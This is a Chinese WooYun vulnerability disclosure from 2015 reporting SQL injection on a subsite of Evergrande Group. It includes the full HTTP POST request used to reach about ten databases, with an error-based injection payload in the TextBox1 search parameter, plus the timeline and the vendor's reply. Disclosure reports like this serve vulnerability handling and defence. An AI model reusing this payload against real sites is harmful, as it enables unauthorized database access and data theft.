当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150879

漏洞标题:恒大集团某分站存在SQL注入

相关厂商:恒大集团

漏洞作者: 霝z

提交时间:2015-11-01 20:51

修复时间:2015-12-20 14:50

公开时间:2015-12-20 14:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-01: 细节已通知厂商并且等待厂商处理中
2015-11-05: 厂商已经确认,细节仅向厂商公开
2015-11-15: 细节向核心白帽子及相关领域专家公开
2015-11-25: 细节向普通白帽子公开
2015-12-05: 细节向实习白帽子公开
2015-12-20: 细节向公众公开

简要描述:

涉及10个左右数据库。

详细说明:

1、注入点:

POST /postsearch.aspx HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Referer: http://**.**.**.**/postsearch.aspx
Accept-Language: en-us,en;q=0.5
Host: **.**.**.**
Cookie: ASP.NET_SessionId=tc300dsnjcaeth2ssciulg5j; safedog-flow-item=0AE14BCB0CC9D9FC79FF7D5F6337A4F1
Accept-Encoding: gzip, deflate
Content-Length: 8671
Content-Type: application/x-www-form-urlencoded
__VIEWSTATE=
%2fwEPDwUJOTIwOTUwNzEwD2QWBGYPFgIeBFRleHQFSAo8TUVUQSBuYW1lPSJLZXl3b3JkcyIgY29udGVudD0iIj4KDTxNRVRBIG5hbWU9IkRlc2NyaXB0aW9uI
iBjb250ZW50PSIiPmQCAQ9kFgoCAQ9kFgICAQ8WAh8ABTY8aW1nIHNyYz0iaW1hZ2VzL3JjenAuanBnIiB3aWR0aD0iOTQyIiBoZWlnaHQ9IjIwMCIgLz5kAgMP
ZBYEAgEPFgIfAAUgPGltZyBzcmM9ImltYWdlcy9sZWZ0XzA0LmpwZyIgLz5kAgsPFgIeB1Zpc2libGVnZAIJDxYCHwAF9wYNCuWbveS7peaJjeeri%2b
%2b8jOS4muS7peaJjeWFtOOAguS6uuaJjeaYr%2bS8geS4muWPkeWxleeahOagueacrO%2b8jOaYr%2baOqOWKqOS8geS4mui3qOi2iuW8j
%2bWPkeWxleeahOesrOS4gOeUn%2bS6p%2bWKm%2bOAguaBkuWkp%2bmHjeinhuWboumYn%2bW7uuiuvu%2b8jOWkmua4oOmBk%2bW8lei%2fm
%2bS6uuaJjeOAgemrmOaViOacuuWItuWfueWFu%2bS6uuaJjeOAgeW5v%2bmYlOW5s%2bWPsOaZi%2bWNh%2bS6uuaJje%2b8jOS4uuS8geS4muWcqOa
%2fgOeDiOernuS6ieS4reeri%2bS6juS4jei0peS5i%2bWcsOaPkOS%2bm%2bW8uuacieWKm%2beahOS%2fnemanOOAgg0K5Zyo5byV6L
%2bb5Lq65omN5pa56Z2i77yM5oGS5aSn5bu656uL6auY5qCH5YeG44CB6YCC5bqm6LaF5YmN55qE5Lq65omN5byV5YWl5py65Yi277yM5byA6L6f5qCh5Zut5ou
b6IGY44CB56S%2b5Lya5oub6IGY44CB5rW35aSW5byV6L%2bb562J5rig6YGT77yM5bm
%2f57qz6LSk5omN77yM5Lil5qC8562b6YCJ77yM5aSn5rWq5reY6YeR44CCDQrlnKjln7norq3kurrmiY3mlrnpnaLvvIzmgZLlpKflu7rnq4vkuoblhajmlrnk
vY3jgIHns7vnu5%2fljJbnmoTln7norq3kvZPns7vvvIzku6XmlofljJbono3lhaXkuLrlhbPplK7vvIzku6XorqHliJLnrqHnkIbkuLrmoLjlv4PvvIzku6Xln
Kjlrp7miJjkuK3mj5DljYflkZjlt6Xog73lipvmsLTlubPkuLrokL3ohJrngrnvvIzln7nlhbvkuobkuIDmibnlj4jkuIDmibnliqrlipvmi7zmkI
%2fjgIHlvIDmi5Pov5vlj5bnmoTmgZLlpKfkurrjgIINCuWcqOaZi%2bWNh%2bS6uuaJjeaWuemdou%2b8jOaBkuWkp%2beahOmrmOmAn%2bOAgeWkmuWFg
%2bWMluWPkeWxle%2b8jOS4uuavj%2bS4gOS4quaBkuWkp%2bS6uuaPkOS%2bm%2bS6huW5v%2bmYlOeahOWPkeWxleepuumXtOWSjOaZi%2bWNh%2bW5s
%2bWPsOOAguWRmOW3peeahOS4u
%2bingi4uLmQCDw88KwAJAQAPFgQeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50AgpkFhQCAQ9kFgJmDxULATEBMQbmloflkZgBMQExATEV6LS16Ziz5Y
%2bK5ZGo6L655Z%2bO5biCAAAAtALmi5vogZjmnaHku7bvvJrlpbPvvIwyOOWygeS7peS4i%2b%2b8jOS4reaWh%2betieebuOWFs%2bS4k
%2bS4muacrOenkeWPiuS7peS4iuWtpuWOhu%2b8jOesrOS4gOWtpuWOhuacrOenke%2b8jOebuOiyjOerr%2bW6hO%2b8jOawlOi0qOS9s%2b%2b8jOaciei
%2bg%2bW8uueahOWNj%2biwg%2biDveWKm%2bWSjOivreiogOihqOi%2bvuiDveWKm
%2bOAgg0KDQrlpIfms6jvvJrmraTlspfkvY3lj6%2fog73lnKjotLXpmLPluILmiJblkajovrnln47luILlt6XkvZzjgIINCg0K6IGU57O75Lq677ya5b6Q5bCP
5aeQICDmmJPlsI%2flp5ANCuiBlOezu%2beUteivne%2b8mjQ4NTQ1NzEgNDg1MjE1N2QCAg9kFgJmDxULATIBMhnkurrkuovkuJPlkZgv6KGM5pS
%2f5LiT5ZGYATIBMgEyFei0temYs%2bWPiuWRqOi%2bueWfjuW4ggAANOW3peS9nOe7j%2bmqjDflubTku6XkuIrolqrotYTlvoXpgYfvvJoxMDAwMOWFgy
%2fmnIjotbesAuaLm%2biBmOadoeS7tu%2b8mjI3772eNDDlsoHvvIzkurrlipvotYTmupDjgIHooYzmlL
%2fnrqHnkIbnrYnnm7jlhbPkuJPkuJrmnKznp5Hlj4rku6XkuIrlrabljobvvIznrKzkuIDlrabljobmnKznp5Hmr5XkuJo15bm05Lul5LiK77yMNeW5tOS7peS
4iuebuOWFs%2bWyl%2bS9jeW3peS9nOe7j
%2bmqjOOAgg0KDQrlpIfms6jvvJrmraTlspfkvY3lj6%2fog73lnKjotLXpmLPluILmiJblkajovrnln47luILlt6XkvZzjgIINCg0K6IGU57O75Lq677ya5b6Q
5bCP5aeQICDmmJPlsI%2flp5ANCuiBlOezu%2beUteivne
%2b8mjQ4NTQ1NzEgNDg1MjE1N2QCAw9kFgJmDxULATMBMwnkvJrorqHluIgBMwEzATMV6LS16Ziz5Y%2bK5ZGo6L655Z%2bO5biCAAA05bel5L2c57uP6aqMN
%2bW5tOS7peS4iuiWqui1hOW%2bhemBh%2b%2b8mjExNTAw5YWDL%2baciOi1t%2bsC5oub6IGY5p2h5Lu277yaMjfvvZ40MOWyge
%2b8jOi0ouS8muOAgemHkeiejeetieebuOWFs%2bS4k%2bS4muacrOenkeWPiuS7peS4iuWtpuWOhu
%2b8jOesrOS4gOWtpuWOhuacrOenkeavleS4mjXlubTku6XkuIrvvIw15bm05Lul5LiK55u45YWz5bKX5L2N5bel5L2c57uP6aqM77yM54af57uD5pON5L2c55u
45YWz6LSi5Yqh6L2v5Lu277yM5pyJ5oi%2f5Zyw5Lqn6KGM5Lia5bel5L2c57uP6aqM6ICF5LyY5YWI44CCDQoNCuWkh%2bazqO%2b8muatpOWyl%2bS9jeWPr
%2biDveWcqOi0temYs%2bW4guaIluWRqOi%2bueWfjuW4guW3peS9nOOAgg0KDQrogZTns7vkurrvvJrlvpDlsI%2flp5AgIOaYk%2bWwj
%2bWnkA0K6IGU57O755S16K
%2bd77yaNDg1NDU3MSA0ODUyMTU3ZAIED2QWAmYPFQsBNAE0BuWHuue6swE0ATQBNBXotLXpmLPlj4rlkajovrnln47luIIAAADBAuaLm%2biBmOadoeS7tu
%2b8mjI0772eMzXlsoHvvIzkvJrorqHlrabmiJbotKLliqHnrqHnkIbnsbvnm7jlhbPkuJPkuJrmnKznp5Hlj4rku6XkuIrlrabljobvvIznrKzkuIDlrabljob
mnKznp5Hmr5XkuJoy5bm05Lul5LiK77yMMuW5tOS7peS4iuWHuue6s%2bW3peS9nOe7j%2bmqjO%2b8jOWFt%2bWkh%2biJr
%2bWlveeahOiBjOS4muaTjeWuiOOAgg0KDQrlpIfms6jvvJrmraTlspfkvY3lj6%2fog73lnKjotLXpmLPluILmiJblkajovrnln47luILlt6XkvZzjgIINCg0K
6IGU57O75Lq677ya5b6Q5bCP5aeQICDmmJPlsI%2flp5ANCuiBlOezu%2beUteivne
%2b8mjQ4NTQ1NzEgNDg1MjE1N2QCBQ9kFgJmDxULATUBNQbmlLbpk7YBNQE1ATUV6LS16Ziz5Y%2bK5ZGo6L655Z
%2bO5biCAAAAoQPmi5vogZjmnaHku7bvvJoyM%2b%2b9njM15bKB77yM5Lya6K6h5a2m5oiW6LSi5Yqh566h55CG57G755u45YWz5LiT5Lia5pys56eR5Y
%2bK5Lul5LiK5a2m5Y6G77yM56ys5LiA5a2m5Y6G5pys56eR5q%2bV5LiaMeW5tOS7peS4iu
%2b8jDHlubTku6XkuIrmlLbpk7blt6XkvZznu4%2fpqozvvIznhp%2fnu4Pmk43kvZzpk7bogZTliLfljaHns7vnu5%2flj4rnnJ
%2flgYfluIHor4bliKvvvIzlhbflpIfoia%2flpb3nmoTogYzkuJrmk43lrojvvIzmnInmiL
%2flnLDkuqfkvIHkuJrmlLbpk7blt6XkvZznu4%2fpqozkvJjlhYjjgIINCg0K5aSH5rOo77ya5q2k5bKX5L2N5Y
%2bv6IO95Zyo6LS16Ziz5biC5oiW5ZGo6L655Z%2bO5biC5bel5L2c44CCDQoNCuiBlOezu%2bS6uu%2b8muW%2bkOWwj
%2bWnkCAg5piT5bCP5aeQDQrogZTns7vnlLXor53vvJo0ODU0NTcxIDQ4NTIxNTdkAgYPZBYCZg8VCwE2ATYJ5oql5bu65ZGYATYBNgE2Fei0temYs
%2bWPiuWRqOi%2bueWfjuW4ggAANOW3peS9nOe7j%2bmqjDflubTku6XkuIrolqrotYTlvoXpgYfvvJoxMDAwMOWFgy%2fmnIjotbehA%2baLm
%2biBmOadoeS7tu
%2b8mjIz772eMzXlsoHvvIzkvJrorqHlrabmiJbotKLliqHnrqHnkIbnsbvnm7jlhbPkuJPkuJrmnKznp5Hlj4rku6XkuIrlrabljobvvIznrKzkuIDlrabljob
mnKznp5Hmr5XkuJox5bm05Lul5LiK77yMMeW5tOS7peS4iuaUtumTtuW3peS9nOe7j%2bmqjO%2b8jOeGn%2be7g%2baTjeS9nOmTtuiBlOWIt%2bWNoeezu
%2be7n%2bWPiuecn%2bWBh%2bW4geivhuWIq%2b%2b8jOWFt%2bWkh%2biJr%2bWlveeahOiBjOS4muaTjeWuiO%2b8jOacieaIv%2bWcsOS6p
%2bS8geS4muaUtumTtuW3peS9nOe7j
%2bmqjOS8mOWFiOOAgg0KDQrlpIfms6jvvJrmraTlspfkvY3lj6%2fog73lnKjotLXpmLPluILmiJblkajovrnln47luILlt6XkvZzjgIINCg0K6IGU57O75Lq6
77ya5b6Q5bCP5aeQICDmmJPlsI%2flp5ANCuiBlOezu%2beUteivne%2b8mjQ4NTQ1NzEgNDg1MjE1N2QCBw9kFgJmDxULATcBNw
%2flu7rnrZHorr7orqHluIgBNwE3ATcV6LS16Ziz5Y%2bK5ZGo6L655Z%2bO5biCAAA05bel5L2c57uP6aqMN%2bW5tOS7peS4iuiWqui1hOW%2bhemBh%2b
%2b8mjE0NTAw5YWDL%2baciOi1t%2fAC5oub6IGY5p2h5Lu277yaMjfvvZ40MOWyge%2b8jOW7uuetkeexu%2bebuOWFs%2bS4k
%2bS4muacrOenkeWPiuS7peS4iuWtpuWOhu
%2b8jOesrOS4gOWtpuWOhuacrOenkeavleS4mjXlubTku6XkuIrvvIw15bm05Lul5LiK5pys5LiT5Lia6K6%2b6K6h5bel5L2c57uP6aqM77yM6IO954us56uL5
a6M5oiQ5aSn44CB5Lit5Z6L6aG555uu6K6%2b6K6h77yM5pyJ55Sy57qn6K6%2b6K6h6Zmi5bel5L2c57uP6aqM6ICF5LyY5YWI44CCDQoNCuWkh%2bazqO
%2b8muatpOWyl%2bS9jeWPr%2biDveWcqOi0temYs%2bW4guaIluWRqOi%2bueWfjuW4guW3peS9nOOAgg0KDQrogZTns7vkurrvvJrlvpDlsI
%2flp5AgIOaYk%2bWwj%2bWnkA0K6IGU57O755S16K%2bd77yaNDg1NDU3MSA0ODUyMTU3DQpkAggPZBYCZg8VCwE4ATg857uT5p6EL%2be7meaOkuawtC
%2fnlLXmsJQv5pqW6YCaL%2badkOaWmS%2flrqTlhoUv5Zut5p6X6K6%2b6K6h5biIATgBOAE4Fei0temYs%2bWPiuWRqOi
%2bueWfjuW4ggAANOW3peS9nOe7j%2bmqjDflubTku6XkuIrolqrotYTlvoXpgYfvvJoxMjMwMOWFgy%2fmnIjotbflAuaLm%2biBmOadoeS7tu
%2b8mjI3772eNDDlsoHvvIznm7jlhbPkuJPkuJrmnKznp5Hlj4rku6XkuIrlrabljobvvIznrKzkuIDlrabljobmnKznp5Hmr5XkuJo15bm05Lul5LiK77yMNeW
5tOS7peS4iuacrOS4k%2bS4muiuvuiuoeW3peS9nOe7j%2bmqjO%2b8jOiDveeLrOeri%2bWujOaIkOWkp%2bOAgeS4reWei%2bmhueebruiuvuiuoe
%2b8jOacieeUsue6p%2biuvuiuoemZouW3peS9nOe7j
%2bmqjOiAheS8mOWFiOOAgg0KDQrlpIfms6jvvJrmraTlspfkvY3lj6%2fog73lnKjotLXpmLPluILmiJblkajovrnln47luILlt6XkvZzjgIINCg0K6IGU57O7
5Lq677ya5b6Q5bCP5aeQICDmmJPlsI%2flp5ANCuiBlOezu%2beUteivne%2b8mjQ4NTQ1NzEgNDg1MjE1N2QCCQ9kFgJmDxULATkBOQ
%2fmi5vmoIflt6XnqIvluIgBOQE5ATkV6LS16Ziz5Y%2bK5ZGo6L655Z%2bO5biCAAA05bel5L2c57uP6aqMN%2bW5tOS7peS4iuiWqui1hOW%2bhemBh%2b
%2b8mjExNTAw5YWDL%2baciOi1t
%2boC5oub6IGY5p2h5Lu277yaIDI3772eNDDlsoHvvIzlt6XnqIvpgKDku7fnrYnnm7jlhbPkuJPkuJrmnKznp5Hlj4rku6XkuIrlrabljobvvIznrKzkuIDlra
bljobmnKznp5Hmr5XkuJo15bm05Lul5LiK77yI5aSn5LiT5q%2bV5LiaN%2bW5tOS7peS4iu%2b8ie
%2b8jDXlubTku6XkuIrnm7jlhbPlspfkvY3lt6XkvZznu4%2fpqozvvIznsr7pgJrnm7jlhbPmlL%2fnrZbms5Xop4TvvIznhp
%2fmgonpgKDku7fooYzmg4XjgIINCg0K5aSH5rOo77ya5q2k5bKX5L2N5Y%2bv6IO95Zyo6LS16Ziz5biC5oiW5ZGo6L655Z
%2bO5biC5bel5L2c44CCDQoNCuiBlOezu%2bS6uu%2b8muW%2bkOWwj
%2bWnkCAg5piT5bCP5aeQDQrogZTns7vnlLXor53vvJo0ODU0NTcxIDQ4NTIxNTdkAgoPZBYCZg8VCwIxMAIxMBLpooTlhrPnrpflt6XnqIvluIgCMTACMTACMT
AV6LS16Ziz5Y%2bK5ZGo6L655Z%2bO5biCAAA05bel5L2c57uP6aqMN%2bW5tOS7peS4iuiWqui1hOW%2bhemBh%2b%2b8mjExNTAw5YWDL%2baciOi1t
%2bkC5oub6IGY5p2h5Lu277yaMjfvvZ40MOWyge%2b8jOW3peeoi%2bmAoOS7t%2betieebuOWFs%2bS4k%2bS4muacrOenkeWPiuS7peS4iuWtpuWOhu
%2b8jOesrOS4gOWtpuWOhuacrOenkeavleS4mjXlubTku6XkuIrvvIjlpKfkuJPmr5XkuJo35bm05Lul5LiK77yJ77yMNeW5tOS7peS4iuebuOWFs%2bWyl
%2bS9jeW3peS9nOe7j%2bmqjO%2b8jOeyvumAmuebuOWFs%2baUv%2betluazleinhO%2b8jOeGn%2baCiemAoOS7t
%2bihjOaDheOAgg0KDQrlpIfms6jvvJrmraTlspfkvY3lj6%2fog73lnKjotLXpmLPluILmiJblkajovrnln47luILlt6XkvZzjgIINCg0K6IGU57O75Lq677ya
5b6Q5bCP5aeQICDmmJPlsI%2flp5ANCuiBlOezu%2beUteivne
%2b8mjQ4NTQ1NzEgNDg1MjE1N2QCEQ8PFgQeDF9yZWNvcmRjb3VudAIlHhBDdXJyZW50UGFnZUluZGV4ZmRkZKvqE1Wl
%2bVelP9npSf7%2f5KyF92ZZnKZM3tau3CQxh1Um&__EVENTTARGET=AspNetPager1&__EVENTARGUMENT=2&__EVENTVALIDATION=
%2fwEWAwLSvqqgDwLs0bLrBgKM54rGBonDAVWbvdIaXBjT8dT8OL73b9rqQMEDEhi9msER9j56&TextBox1=%27AND+1%3d(CHAR(95)%2bCHAR(33)%2bCHAR
(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%2b%27


2、注入参数:

pa.jpg


3、涉及DB:

db.jpg

漏洞证明:

shell.jpg


没有继续。

修复方案:

过滤

版权声明:转载请注明来源 霝z@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-05 14:48

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评价

  1. 2015-11-03 11:10 | 李叫兽就四李叫兽 ( 实习白帽子 | Rank:58 漏洞数:8 | 啦啦啦啦)

    中超五连冠,亚冠再夺冠。。。gogogoog